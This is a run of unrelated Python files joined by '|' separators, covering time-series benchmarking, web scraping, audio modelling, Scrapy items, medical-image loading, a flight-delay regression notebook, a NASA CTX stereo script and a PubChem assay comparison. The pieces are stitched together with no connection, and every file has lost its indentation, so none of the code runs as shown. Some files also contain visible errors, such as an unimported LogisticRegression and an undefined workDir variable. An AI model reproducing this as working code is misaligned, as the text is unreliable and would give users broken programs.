"EthanolLevel",
"FaceAll",
"FaceFour",
"FacesUCR",
"FiftyWords",
"Fish",
"FreezerRegularTrain",
"FreezerSmallTrain",
"Ham",
"Haptics",
"Herring",
"InlineSkate",
"InsectEPGRegularTrain",
"InsectEPGSmallTrain",
"InsectWingbeatSound",
"ItalyPowerDemand",
"LargeKitchenAppliances",
"Lightning2",
"Lightning7",
"Mallat",
"Meat",
"MedicalImages",
"MiddlePhalanxOutlineCorrect",
"MiddlePhalanxOutlineAgeGroup",
"MiddlePhalanxTW",
"MixedShapesRegularTrain",
"MixedShapesSmallTrain",
"MoteStrain",
"OliveOil",
"OSULeaf",
"PhalangesOutlinesCorrect",
"Phoneme",
"PigAirwayPressure",
"PigArtPressure",
"PigCVP",
"Plane",
"PowerCons",
"ProximalPhalanxOutlineCorrect",
"ProximalPhalanxOutlineAgeGroup",
"ProximalPhalanxTW",
"RefrigerationDevices",
"Rock",
"ScreenType",
"SemgHandGenderCh2",
"SemgHandMovementCh2",
"SemgHandSubjectCh2",
"ShapeletSim",
"SmallKitchenAppliances",
"SmoothSubspace",
"SonyAIBORobotSurface1",
"SonyAIBORobotSurface2",
"Strawberry",
"SwedishLeaf",
"Symbols",
"SyntheticControl",
"ToeSegmentation1",
"ToeSegmentation2",
"Trace",
"TwoLeadECG",
"TwoPatterns",
"UMD",
"UWaveGestureLibraryX",
"UWaveGestureLibraryY",
"UWaveGestureLibraryZ",
"Wafer",
"Wine",
"WordSynonyms",
"Worms",
"WormsTwoClass",
"Yoga",
]
if __name__ == "__main__":
"""
Example simple usage, with arguments input via script or hard coded for testing
"""
if sys.argv.__len__() > 1: # cluster run, this is fragile
print(sys.argv)
data_dir = sys.argv[1]
results_dir = sys.argv[2]
classifier = sys.argv[3]
dataset = sys.argv[4]
resample = int(sys.argv[5]) - 1
tf = str(sys.argv[6]) == "True"
run_experiment(
problem_path=data_dir,
results_path=results_dir,
cls_name=classifier,
dataset=dataset,
resampleID=resample,
train_file=tf,
)
else: # Local run
print(" Local Run")
data_dir = "Z:/ArchiveData/Univariate_ts/"
results_dir = "Z:/Results Working Area/DistanceBased/sktime/"
dataset = "ArrowHead"
trainX, trainY = load_ts(data_dir + dataset + "/" + dataset + "_TRAIN.ts")
testX, testY = load_ts(data_dir + dataset + "/" + dataset + "_TEST.ts")
classifier = "1NN-MSM"
resample = 0
# for i in range(0, len(univariate_datasets)):
# dataset = univariate_datasets[i]
# # print(i)
# # print(" problem = "+dataset)
tf = False
for i in range(0, len(benchmark_datasets)):
dataset = benchmark_datasets[i]
run_experiment(
overwrite=True,
problem_path=data_dir,
results_path=results_dir,
cls_name=classifier,
dataset=dataset,
resampleID=resample,
train_file=tf,
)
|
__all__ = ["Log", "Progbar", "RandomSeeds", "ModelParamStore", "DefaultDict", "Visualize"]
|
# coding: utf-8
import requests
from bs4 import BeautifulSoup
url = "http://www.pythonscraping.com/pages/page3.html"
res = requests.get(url)
bs = BeautifulSoup(res.text,'html.parser')
for child in bs.find("table", {"id":"giftList"}).children:
print(child)
|
inp = list(map(int, input().split()))
before = inp.copy()
inp.sort()
for i in inp:
print(i)
print()
for j in before:
print(j)
|
# encoding: utf-8
"""Custom element classes related to end-notes"""
from __future__ import absolute_import, division, print_function, unicode_literals
from docx.oxml.xmlchemy import BaseOxmlElement
class CT_Endnotes(BaseOxmlElement):
"""`w:endnotes` element"""
|
import sys
import matplotlib.pyplot as plt
import numpy as np
def readData(dataFile):
data=[]
with open(dataFile) as f:
for line in f:
items = line.split(' ')
assert len(items) == 4
tup = (int(items[0]), int(items[1]), int(items[2]), float(items[3]))
data.append(tup)
return data
def draw(nml, results):
for key in results.keys():
revKey = tuple(reversed(key))
sr = results[key]
f, ax = plt.subplots()
label = 'TS_%02d_NC_%06d' % revKey
ax.plot(nml, sr, marker='o')
ax.set_ylim(ymin=0)
ax.set_xticks(nml)
ax.set_xlabel('Num Machines')
ax.set_ylabel('Transactions Per Sec')
ax.set_title('Performance, transactionSize: %d, numComps: %d' % revKey)
f.savefig('perf_%s.png' % label)
def drawOld(nml, results):
f, axarr = plt.subplots(6)
for key in sorted(results.keys()):
pos = sorted(results.keys()).index(key)
assert pos >= 0 and pos < len(results)
pos = len(results) - 1 - pos
sr = results[key]
name = 'nc_%d_cpt_%d' % key
ax = axarr[pos]
ax.plot(nml, sr, label=name)
ax.legend(loc='best')
plt.xlabel('Machines')
plt.ylabel('Trans/sec')
plt.title('Performance')
plt.savefig('Performance.png')
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: dataFile')
sys.exit(1)
data = readData(sys.argv[1])
for tup in data:
print('%d %d %d %6.2f' % tup)
nml = sorted(list(set([tup[0] for tup in data])))
ncl = sorted(list(set([tup[1] for tup in data])))
cptl = sorted(list(set([tup[2] for tup in data])))
plotData = {}
for cpt in cptl:
for nc in ncl:
subRes = {}
key = (nc, cpt)
plotData[key] = []
for nm in nml:
res = [tup[3] for tup in data if tup[0] == nm and tup[1] == nc and tup[2] == cpt]
assert len(res) == 1
plotData[key].append(res[0])
for kt in plotData.keys():
print('%s -> %s' % (str(kt), str(plotData[kt])))
draw(nml, plotData)
|
import os
from abc import ABC
from thonny import get_runner
from thonny.common import normpath_with_actual_case
from thonny.plugins.cpython_frontend.cp_front import LocalCPythonProxy
from thonny.plugins.pip_gui import BackendPipDialog
class CPythonPipDialog(BackendPipDialog, ABC):
def _is_read_only(self):
# readonly if not in a virtual environment
# and user site packages is disabled
return (
self._use_user_install()
and not get_runner().get_backend_proxy().get_user_site_packages()
)
def _get_target_directory(self):
if self._use_user_install():
usp = self._backend_proxy.get_user_site_packages()
if isinstance(self._backend_proxy, LocalCPythonProxy):
os.makedirs(usp, exist_ok=True)
return normpath_with_actual_case(usp)
else:
return usp
else:
sp = self._backend_proxy.get_site_packages()
if sp is None:
return None
return normpath_with_actual_case(sp)
def _use_user_install(self):
return not self._targets_virtual_environment()
def _targets_virtual_environment(self):
return get_runner().using_venv()
class LocalCPythonPipDialog(CPythonPipDialog):
def _installer_runs_locally(self):
return True
def _get_interpreter_description(self):
return get_runner().get_backend_proxy().get_target_executable()
def _normalize_target_path(self, path: str) -> str:
return normpath_with_actual_case(path)
def _append_location_to_info_path(self, path):
self.info_text.direct_insert("end", normpath_with_actual_case(path), ("url",))
|
from typing import List
import collections
import heapq
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
if k == len(nums):
return nums
count = collections.Counter(nums)
return heapq.nlargest(k, count.keys(), key = count.get)
if __name__== '__main__':
solution = Solution()
nums = [1,1,1,2,2,3]
k = 2
ans = solution.topKFrequent(nums, k)
print(ans)
|
# function to call the main analysis/synthesis functions in software/models/sineModel.py
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import get_window
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../models/'))
import utilFunctions as UF
import sineModel as SM
def main(inputFile='../../sounds/bendir.wav', window='hamming', M=2001, N=2048, t=-80, minSineDur=0.02,
maxnSines=150, freqDevOffset=10, freqDevSlope=0.001):
"""
Perform analysis/synthesis using the sinusoidal model
inputFile: input sound file (monophonic with sampling rate of 44100)
window: analysis window type (rectangular, hanning, hamming, blackman, blackmanharris)
M: analysis window size; N: fft size (power of two, bigger or equal than M)
t: magnitude threshold of spectral peaks; minSineDur: minimum duration of sinusoidal tracks
maxnSines: maximum number of parallel sinusoids
freqDevOffset: frequency deviation allowed in the sinusoids from frame to frame at frequency 0
freqDevSlope: slope of the frequency deviation, higher frequencies have bigger deviation
"""
# size of fft used in synthesis
Ns = 512
# hop size (has to be 1/4 of Ns)
H = 128
# read input sound
fs, x = UF.wavread(inputFile)
# compute analysis window
w = get_window(window, M)
# analyze the sound with the sinusoidal model
tfreq, tmag, tphase = SM.sineModelAnal(x, fs, w, N, H, t, maxnSines, minSineDur, freqDevOffset, freqDevSlope)
# synthesize the output sound from the sinusoidal representation
y = SM.sineModelSynth(tfreq, tmag, tphase, Ns, H, fs)
# output sound file name
outputFile = 'output_sounds/' + os.path.basename(inputFile)[:-4] + '_sineModel.wav'
# write the synthesized sound obtained from the sinusoidal synthesis
UF.wavwrite(y, fs, outputFile)
# create figure to show plots
plt.figure(figsize=(9, 6))
# frequency range to plot
maxplotfreq = 5000.0
# plot the input sound
plt.subplot(3,1,1)
plt.plot(np.arange(x.size)/float(fs), x)
plt.axis([0, x.size/float(fs), min(x), max(x)])
plt.ylabel('amplitude')
plt.xlabel('time (sec)')
plt.title('input sound: x')
# plot the sinusoidal frequencies
plt.subplot(3,1,2)
if (tfreq.shape[1] > 0):
numFrames = tfreq.shape[0]
frmTime = H*np.arange(numFrames)/float(fs)
tfreq[tfreq<=0] = np.nan
plt.plot(frmTime, tfreq)
plt.axis([0, x.size/float(fs), 0, maxplotfreq])
plt.title('frequencies of sinusoidal tracks')
# plot the output sound
plt.subplot(3,1,3)
plt.plot(np.arange(y.size)/float(fs), y)
plt.axis([0, y.size/float(fs), min(y), max(y)])
plt.ylabel('amplitude')
plt.xlabel('time (sec)')
plt.title('output sound: y')
plt.tight_layout()
plt.ion()
plt.show()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scrapy import Item, Field
class Subject(Item):
douban_id = Field()
type = Field()
class Meta(Item):
douban_id = Field()
type = Field()
cover = Field()
name = Field()
slug = Field()
year = Field()
directors = Field()
actors = Field()
genres = Field()
official_site = Field()
regions = Field()
languages = Field()
release_date = Field()
mins = Field()
alias = Field()
imdb_id = Field()
douban_id = Field()
douban_score = Field()
douban_votes = Field()
tags = Field()
storyline = Field()
class Comment(Item):
douban_id = Field()
douban_comment_id = Field()
douban_user_nickname = Field()
douban_user_avatar = Field()
douban_user_url = Field()
content = Field()
votes = Field()
|
#CLASE EDIFICIOS
class Edificio:
#Atributos del Objeto
def __init__(self, type, count, huella, dptos, ancho, largo, adpto, prior, areacons, niveles):
self.type = type
self.count = count
self.huella = huella
self.dptos = dptos
self.ancho = ancho
self.largo = largo
self.adpto = adpto
self.prior = prior
self.areacons = areacons
self.niveles = niveles
|
import os
import glob
import numpy as np
import torch
import pydicom
from pydicom.pixel_data_handlers.util import apply_modality_lut
import nibabel as nib
def read_ct_scan(ct_dir, hu_range=None):
dicom_paths = glob.glob(f"{ct_dir}/*.dcm")
dicom_files = sorted(
[pydicom.read_file(path) for path in dicom_paths],
key=lambda ds: ds.SliceLocation,
)
ct_arr = [apply_modality_lut(ds.pixel_array, ds) for ds in dicom_files]
ct_arr = np.array(ct_arr, dtype=np.float32)
return ct_arr
def read_masks(fpath):
seg_file = nib.load(fpath)
masks = seg_file.dataobj[:].astype(np.float32)
# move z dim to 1st dim
masks = masks.transpose(2, 0, 1)
# match mask to CT image orientation
masks = np.rot90(masks, k=1, axes=(1, 2))
# remove left, right lung information
masks[masks > 0] = 1.0
masks = np.ascontiguousarray(masks)
return masks
def read_mask(fpath, slice_idx):
seg_file = nib.load(fpath)
mask = seg_file.dataobj[..., slice_idx].astype(np.int64)
# match mask to CT image orientation
mask = np.rot90(mask, k=1)
# remove left, right lung information
mask[mask > 0] = 1
mask = np.ascontiguousarray(mask)
return mask
def get_common_ids(*dirs):
res = set.intersection(*[set(os.listdir(d)) for d in dirs])
return sorted(list(res))
|
"""Assigment#1.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1zDOQ7DiZycLsPiQp9KkLTJIKcqIqOAjl
"""
# Commented out IPython magic to ensure Python compatibility.
import datetime, warnings, scipy
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from sklearn import metrics, linear_model
from sklearn.metrics import r2_score
from sklearn.preprocessing import PolynomialFeatures
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from scipy.optimize import curve_fit
# %matplotlib inline
warnings.filterwarnings("ignore")
df = pd.read_csv('./flight_delay.csv', low_memory=False)
print('Dataframe dimensions:', df.shape)
def df_info(df):
tab_info=pd.DataFrame(df.dtypes).T.rename(index={0:'column type'})
tab_info=tab_info.append(pd.DataFrame(df.isnull().sum()).T.rename(index={0:'null values (nb)'}))
tab_info=tab_info.append(pd.DataFrame(df.isnull().sum()/df.shape[0]*100)
.T.rename(index={0:'null values (%)'}))
return tab_info
# Calculate zeros delay in whole dataset
zero_delay_whole_dataset = (df['Delay']==0).sum()
print(zero_delay_whole_dataset)
print(f"% of zero delays in dataset: {zero_delay_whole_dataset/df.shape[0]*100})")
"""**Add additional feature - Duration of the flight in minutes & Delayed Fact**"""
flight_duration = pd.to_datetime(df['Scheduled arrival time']) - pd.to_datetime(df['Scheduled depature time'])
flight_duration = pd.to_timedelta(flight_duration).astype('timedelta64[m]').astype(int)
df.info()
# Preprocessing data
df['Duration'] = flight_duration
df['Year'] = pd.DatetimeIndex(df['Scheduled depature time']).year
df['Month'] = pd.DatetimeIndex(df['Scheduled depature time']).month
df['Day'] = pd.DatetimeIndex(df['Scheduled depature time']).day
df['Scheduled depature time'] = pd.to_datetime(df['Scheduled depature time'])
df['Scheduled arrival time'] = pd.to_datetime(df['Scheduled arrival time'])
df['Depature Airport'] = df['Depature Airport'].astype("category")
df['Destination Airport'] = df['Destination Airport'].astype("category")
df['Departure time'] = df['Scheduled depature time'].dt.time
df['IS_delay'] = (df['Delay'] > 0).astype('int')
"""**Visualization**"""
"""**Missing Values**"""
#Now we will check the missing values of the dataset to detect unusable features and when and how are the rest of the missing values meaningful.
def missing_values_checker(dataframe):
sums = dataframe.isna().sum(axis=0)
nan_count_limit = 0
# crate tuples (nan_sum, column_name), filter it and sort it
non_zero_pairs = sorted([pair for pair in zip(sums, dataframe.columns) if pair[0] > nan_count_limit])
non_zero_pairs.append((len(dataframe), 'Result'))
# split tuples into separate lists
non_zero_sums, non_zero_labels = zip(*non_zero_pairs)
nans_range = np.asarray(range(len(non_zero_sums)))
# print info
for i, (non_zero_sum, non_zero_label) in enumerate(non_zero_pairs):
print('{}, {}: {}'.format(i, non_zero_label, non_zero_sum))
# plot info
plt.figure()
ax = plt.gca()
ax.set_xticks(nans_range)
plt.bar(nans_range, non_zero_sums)
plt.show()
feature_dist = df['Depature Airport'].value_counts()
print(feature_dist)
feature_dist.count()
def check_feature_dist(feature_name,data_frame):
carrier_count = data_frame[f"{feature_name}"].value_counts()
sns.set(style="darkgrid")
sns.barplot(carrier_count.index, carrier_count.values, alpha=0.9)
plt.title(f'Frequency Distribution of {feature_name}')
plt.ylabel('Number of Occurrences', fontsize=12)
plt.xlabel(f'{feature_name}', fontsize=12)
plt.show()
"""**Label encoding**"""
list_categorical_features = df.select_dtypes(include=['object']).columns.to_list()
list_categorical_features.append('Depature Airport')
list_categorical_features.append('Destination Airport')
list_categorical_features
labels_airport = df['Depature Airport']
lb_make = LabelEncoder()
integer_encoded = lb_make.fit_transform(df['Depature Airport'])
zipped = zip(integer_encoded, df['Depature Airport'])
label_airports = list(set(list(zipped)))
label_airports.sort(key = lambda x:x[0])
onehot_encoder = OneHotEncoder(sparse=False)
integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)
onehot_encoded = onehot_encoder.fit_transform(integer_encoded)
correlations = df.corr()
plt.figure(figsize=(12,12))
sns.heatmap(correlations, center=0, annot=True, vmin=-1, vmax=1, cmap="BrBG")
plt.show()
# visualize the relationship between the features and the response using scatterplots
pp = sns.pairplot(df, x_vars=['Duration'], y_vars='Delay', size=7, aspect=0.7)
pp.fig.suptitle("Correlation between Duration and Delay")
# sns.pairplot(df, x_vars=['Duration'], y_vars='Delay', size=7, aspect=0.7, kind='reg')
df['DATE'] = pd.to_datetime(df[['Year','Month', 'Day']])
dep_airport = 'SVO'
df2 = df[(df['Depature Airport'] == dep_airport) & (df['Delay'] > 0)]
df2.sort_values('Scheduled depature time', inplace = True)
df2.head()
plt.figure(figsize=(12,12))
plt.scatter(df2['Scheduled depature time'], df2['Delay'], label='initial data points')
plt.title("Corelation between depart time and delay for SVO")
plt.xlabel('Departure time', fontsize = 14)
plt.ylabel('Delay', fontsize = 14)
train = df.loc[(df['Year'] <= 2017) & (df['Year'] >=2015)]
test = df.loc[df['Year'] == 2018]
# get only categorical features
cat_df_flights = train.select_dtypes(include=['object']).copy()
cat_df_flights.head()
print(cat_df_flights.columns.to_list())
print(cat_df_flights.isnull().values.sum())
print(cat_df_flights.isnull().sum())
"""**Remove outliers on delay**"""
# calculate m
mean = train['Delay'].mean()
print(mean)
# calculate standard deviation
sd = train['Delay'].std()
# determine a threhold
threshold = 2
# detect outlier
train['z_score'] = (train['Delay'] - mean)/sd
train.loc[abs(train['z_score']) > threshold, 'z_score'] = None
train = train.dropna()
pp = sns.pairplot(train, x_vars=['Duration'], y_vars='Delay', size=7, aspect=0.7)
pp.fig.suptitle("Correlation between Duration and Delay")
"""**Models execution**"""
# Apply diffrent models on dataset
from sklearn.linear_model import LinearRegression
lm = linear_model.LinearRegression()
model = lm.fit(train['Duration'].to_numpy().reshape(-1, 1), train['Delay'])
predictions = lm.predict(train['Duration'].to_numpy().reshape(-1, 1))
print("MSE_train =", metrics.mean_squared_error(predictions, train['Delay']))
lm = linear_model.LinearRegression()
model = lm.fit(train['Duration'].to_numpy().reshape(-1, 1), train['Delay'])
predictions = lm.predict(test['Duration'].to_numpy().reshape(-1, 1))
print("MSE_test =", metrics.mean_squared_error(predictions, test['Delay']))
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
y_pred = pd.DataFrame(data=predictions).astype('int64')
df_info(y_pred)
print(f"Accuracy score: {accuracy_score(test['Duration'], y_pred=y_pred)}")
poly = PolynomialFeatures(degree = 4)
regr = linear_model.LinearRegression()
X_ = poly.fit_transform(train['Duration'].to_numpy().reshape(-1, 1))
regr.fit(X_, train['Delay'])
result = regr.predict(X_)
print("MSE_train =", metrics.mean_squared_error(result, train['Delay']))
tips = pd.DataFrame()
tips["prediction"] = pd.Series([float(s) for s in result])
tips["original_data"] = pd.Series([float(s) for s in train['Delay']])
sns.jointplot(x="original_data", y="prediction", data=tips, size = 6, ratio = 7,
joint_kws={'line_kws':{'color':'limegreen'}}, kind='reg')
plt.xlabel('Mean delays (min)', fontsize = 15)
plt.ylabel('Predictions (min)', fontsize = 15)
plt.plot(list(range(-10,25)), list(range(-10,25)), linestyle = ':', color = 'r')
X_ = poly.fit_transform(test['Duration'].to_numpy().reshape(-1, 1))
result = regr.predict(X_)
score = metrics.mean_squared_error(result, test['Delay'])
print("Mean squared error = ", score)
zero_delay_test_dataset = (test['Delay']==0).sum()
print(zero_delay_test_dataset)
print(f"% of zero delays in dataset: {zero_delay_test_dataset/test.shape[0]*100})")
from sklearn.linear_model import Ridge
ridgereg = Ridge(alpha=0.3,normalize=True)
poly = PolynomialFeatures(degree = 4)
X_ = poly.fit_transform(train['Duration'].to_numpy().reshape(-1, 1))
ridgereg.fit(X_, train['Delay'])
X_ = poly.fit_transform(test['Duration'].to_numpy().reshape(-1, 1))
result = ridgereg.predict(X_)
score = metrics.mean_squared_error(result, test['Delay'])
print("Mean squared error withy regurilization = ", score)
print(f"R2 score{r2_score(test['Delay'], result)}")
res_score = 10000
for rank in range(1, 4):
for alpha in range(0, 20, 2):
ridgereg = Ridge(alpha = alpha/10, normalize=True)
poly = PolynomialFeatures(degree = rank)
regr = linear_model.LinearRegression()
X_ = poly.fit_transform(train['Duration'].to_numpy().reshape(-1, 1))
ridgereg.fit(X_, train['Delay'])
X_ = poly.fit_transform(test['Duration'].to_numpy().reshape(-1, 1))
result = ridgereg.predict(X_)
score = metrics.mean_squared_error(result, test['Delay'])
if score < res_score:
res_score = score
parameters = [alpha/10, rank]
print("n = {} alpha = {} , MSE = {:<0.5}".format(rank, alpha, score))
logistic_reg = LogisticRegression(penalty='l1', solver='saga')
logistic_reg.fit(train['Duration'].to_numpy().reshape(-1, 1), train['Delay'])
predictions = logistic_reg.predict(train['Duration'].to_numpy().reshape(-1, 1))
score = metrics.mean_squared_error(train['Duration'], predictions)
print("Mean squared error withy regurilization = ", score)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# __BEGIN_LICENSE__
# Copyright (c) 2009-2013, United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration. All
# rights reserved.
#
# The NGT platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# __END_LICENSE__
import sys, os, glob, optparse, re, shutil, subprocess, string, time
def man(option, opt, value, parser):
print >>sys.stderr, parser.usage
print >>sys.stderr, '''\
Generates a stereo DEM from two LRONAC pairs using SBA and LOLA for increased accuracy.
'''
sys.exit()
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
#--------------------------------------------------------------------------------
def replaceExtensionAndFolder(inputPath, outputFolder, newExtension):
newExt = os.path.splitext(inputPath)[0] + newExtension
return os.path.join(outputFolder, os.path.basename(newExt))
def prepareImage(inputPath, workDir, keep):
"""Prepare a single CTX image for processing"""
# Set up paths
cubPath = replaceExtensionAndFolder(inputPath, workDir, '.cub')
calPath = replaceExtensionAndFolder(inputPath, workDir, '.cal.cub')
# Convert to ISIS format
cmd = 'mroctx2isis from=' + inputPath + ' to=' + cubPath
os.system(cmd)
# Init Spice data
cmd = 'spiceinit from=' + cubPath
os.system(cmd)
# Apply image correction
cmd = 'ctxcal from='+cubPath+' to='+calPath
os.system(cmd)
#you can also optionally run} ctxevenodd \textnormal{on the} cal.cub \textnormal{files, if needed}
if not keep:
os.remove(cubPath)
return calPath
def main():
print '#################################################################################'
print "Running processCtxPair.py"
try:
try:
usage = "usage: processCtxPair.py <left image> <right image> <output prefix> [--workDir <folder>][--keep][--manual]\n "
parser = optparse.OptionParser(usage=usage)
parser.set_defaults(keep=False)
parser.add_option("--workDir", dest="workDir", help="Folder to place intermediate files in")
parser.add_option("--manual", action="callback", callback=man,
help="Read the manual.")
parser.add_option("--keep", action="store_true", dest="keep",
help="Do not delete the temporary files.")
(options, args) = parser.parse_args()
if len(args) < 3:
parser.error('Missing required input!')
options.leftPath = args[0]
options.rightPath = args[1]
options.outputPrefix = args[2]
if not options.workDir:
options.workDir = os.path.dirname(options.outputPrefix)
except optparse.OptionError, msg:
raise Usage(msg)
startTime = time.time()
# Do individual input image preparations
leftCalPath = prepareImage(options.leftPath, options.workDir, options.keep)
rightCalPath = prepareImage(options.rightPath, options.workDir, options.keep)
# Do joint prepration
cmd = 'cam2map4stereo.py ' + leftCalPath + ' ' + rightCalPath
os.system(cmd)
leftMapPath = replaceExtensionAndFolder(options.leftPath, workDir, '.map.cub')
rightMapPath = replaceExtensionAndFolder(options.rightPath, workDir, '.map.cub')
# Final stereo call
cmd = ('parallel_stereo.py ' + leftMapPath + ' ' + rightMapPath + ' ' + options.outputPrefix
+ ' --alignment affineepipolar --subpixel-mode 3 --corr-timeout 400'
+ ' --filter-mode 1 --subpixel-max-levels 0')
os.system(cmd)
# Clean up temporary files
if not options.keep:
os.remove(leftCalPath)
os.remove(rightCalPath)
os.remove(leftMapPath)
os.remove(rightMapPath)
endTime = time.time()
print "Finished in " + str(endTime - startTime) + " seconds."
print '#################################################################################'
return 0
except Usage, err:
print err
print >>sys.stderr, err.msg
return 2
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/env python
#############################################################################
### pubchem_assaysim.py - assay similarity based on activity profiles
### from PubChem CSV assay file[s]
#############################################################################
import os,sys,re,getopt,gzip,zipfile,tempfile
#try:
# import gdbm
#except:
# import dbm as gdbm
from ... import pubchem
PROG=os.path.basename(sys.argv[0])
DATADIR="/home/data/pubchem/bioassay/csv/data"
SCRATCHDIR='/tmp/'+PROG+'_SCRATCHDIR'
#############################################################################
if __name__=='__main__':
usage='''
%(PROG)s - assay similarity based on activity profiles (A vs. B)
required:
--aidA=<AID> ... assay ID A
--aidB=<AID> ... assay ID B
options:
--v ... verbose
--vv ... very verbose
--h ... this help
'''%{'PROG':PROG,'DATADIR':DATADIR}
def ErrorExit(msg):
print >>sys.stderr,msg
sys.exit(1)
indir=DATADIR;
infile=None; verbose=0;
aidA=None; aidB=None;
opts,pargs = getopt.getopt(sys.argv[1:],'',['h','v','vv','indir=',
'aidA=','aidB=','infile=' ])
if not opts: ErrorExit(usage)
for (opt,val) in opts:
if opt=='--h': ErrorExit(usage)
elif opt=='--indir': indir=val
elif opt=='--aidA': aidA=val
elif opt=='--aidB': aidB=val
elif opt=='--vv': verbose=2
elif opt=='--v': verbose=1
else: ErrorExit('Illegal option: %s'%val)
if not (aidA and aidB):
ErrorExit('--aidA and --aidB required\n'+usage)
try:
aidA=int(aidA)
aidB=int(aidB)
except:
ErrorExit('aidA and aidB must be integers.\n'+usage)
###
fpath_csv_gzA=None; fpath_csv_gzB=None;
for fname_zip in os.listdir(indir):
if not re.search('\.zip',fname_zip): continue
fpath_zip=indir+'/'+fname_zip
try:
zf=zipfile.ZipFile(fpath_zip,'r')
except:
print >>sys.stderr, 'ERROR: cannot read fpath_zip: "%s"'%fpath_zip
continue
flist_csv_gz=zf.namelist()
zf.close()
for fpath_csv_gz in flist_csv_gz:
if not re.search('\.csv\.gz',fpath_csv_gz): continue
try:
if re.search(r'/',fpath_csv_gz):
txt=re.sub(r'^.*/(\d*)\.csv\.gz',r'\1',fpath_csv_gz)
else:
txt=re.sub(r'\.csv\.gz','',fpath_csv_gz)
aid=int(txt)
except:
print >>sys.stderr, 'cannot parse AID: "%s"'%fpath_csv_gz
print >>sys.stderr, 'DEBUG txt: "%s"'%txt
continue
if aid==aidA:
fpath_zipA=fpath_zip
fpath_csv_gzA=fpath_csv_gz
if verbose>1:
print >>sys.stderr, '\tA: %s: %s (%s)'%(aidA,fpath_zipA,fpath_csv_gzA)
if aid==aidB:
fpath_zipB=fpath_zip
fpath_csv_gzB=fpath_csv_gz
if verbose>1:
print >>sys.stderr, '\tB: %s: %s (%s)'%(aidB,fpath_zipB,fpath_csv_gzB)
if fpath_csv_gzA and fpath_csv_gzB: break
if fpath_csv_gzA and fpath_csv_gzB: break
if not fpath_csv_gzA:
ErrorExit('ERROR: could not find file for AID %s'%(aidA))
if not fpath_csv_gzB:
ErrorExit('ERROR: could not find file for AID %s'%(aidB))
if not os.access(SCRATCHDIR,os.R_OK):
try:
os.mkdir(SCRATCHDIR)
except:
print >>sys.stderr, 'ERROR: failed to create SCRATCHDIR %s'%SCRATCHDIR
sys.exit(1)
zfA=zipfile.ZipFile(fpath_zipA,'r')
cwd=os.getcwd()
os.chdir(SCRATCHDIR)
zfA.extract(fpath_csv_gzA)
os.chdir(cwd)
zfA.close()
f_csvA=gzip.open(SCRATCHDIR+'/'+fpath_csv_gzA)
csvA=f_csvA.read()
f_csvA.close()
if not csvA:
ErrorExit('ERROR: file empty: AID %d: %s'%(aidA,fpath_csv_gzA))
zfB=zipfile.ZipFile(fpath_zipB,'r')
cwd=os.getcwd()
os.chdir(SCRATCHDIR)
zfB.extract(fpath_csv_gzB)
os.chdir(cwd)
zfB.close()
f_csvB=gzip.open(SCRATCHDIR+'/'+fpath_csv_gzB)
csvB=f_csvB.read()
f_csvB.close()
if not csvB:
ErrorExit('ERROR: file empty: AID %d: %s'%(aidB,fpath_csv_gzB))
sids_active=[]; sids_inactive=[]; sids_inconclusive=[]; sids_unspecified=[];
sids_discrepant=[]; sids_tested=[];
sidset={};
n_datapoints_total=0
use_cids=False;
sidsA=pubchem.ftp.Utils.ExtractOutcomes(csvA,sidset,use_cids)
sidsB=pubchem.ftp.Utils.ExtractOutcomes(csvB,sidset,use_cids)
print >>sys.stderr, '\t aidA, SIDs total: %3d'%(len(sidsA.keys()))
print >>sys.stderr, '\t aidB, SIDs total: %3d'%(len(sidsB.keys()))
sids_all=(set(sidsA.keys()) | set(sidsB.keys()))
sids_common=(set(sidsA.keys()) & set(sidsB.keys()))
print >>sys.stderr, '\t aidA | aidB, SIDs total: %3d'%(len(sids_all))
print >>sys.stderr, '\t aidA & aidB, SIDs common: %3d'%(len(sids_common))
n_activeA=0; n_inactiveA=0; n_inconclusiveA=0; n_unspecifiedA=0; n_discrepantA=0;
n_activeB=0; n_inactiveB=0; n_inconclusiveB=0; n_unspecifiedB=0; n_discrepantB=0;
n_active_common=0
for sid in sids_all:
outcomeA=None;
outcomeB=None;
if sidsA.has_key(sid):
outcomeA=sidsA[sid]['outcome']
if outcomeA==2: n_activeA+=1
elif outcomeA==1: n_inactiveA+=1
elif outcomeA==3: n_inconclusiveA+=1
elif outcomeA==4: n_unspecifiedA+=1
elif outcomeA==5: n_discrepantA+=1
else: print >>sys.stderr, 'ERROR: outcomeA=%d'%(sidsA[sid]['outcome'])
if sidsB.has_key(sid):
outcomeB=sidsB[sid]['outcome']
if outcomeB==2: n_activeB+=1
elif outcomeB==1: n_inactiveB+=1
elif outcomeB==3: n_inconclusiveB+=1
elif outcomeB==4: n_unspecifiedB+=1
elif outcomeB==5: n_discrepantB+=1
else: print >>sys.stderr, 'ERROR: outcomeB=%d'%(sidsB[sid]['outcome'])
if outcomeA==2 and outcomeB==2:
n_active_common+=1
if verbose>1:
print >>sys.stderr, '\tA: active: %3d'%(n_activeA)
print >>sys.stderr, '\tA: inactive: %3d'%(n_inactiveA)
print >>sys.stderr, '\tA: inconclusive: %3d'%(n_inconclusiveA)
print >>sys.stderr, '\tA: unspecified: %3d'%(n_unspecifiedA)
print >>sys.stderr, '\tA: discrepant: %3d'%(n_discrepantA)
print >>sys.stderr, '\tA: total: %3d'%(len(sidsA.keys()))
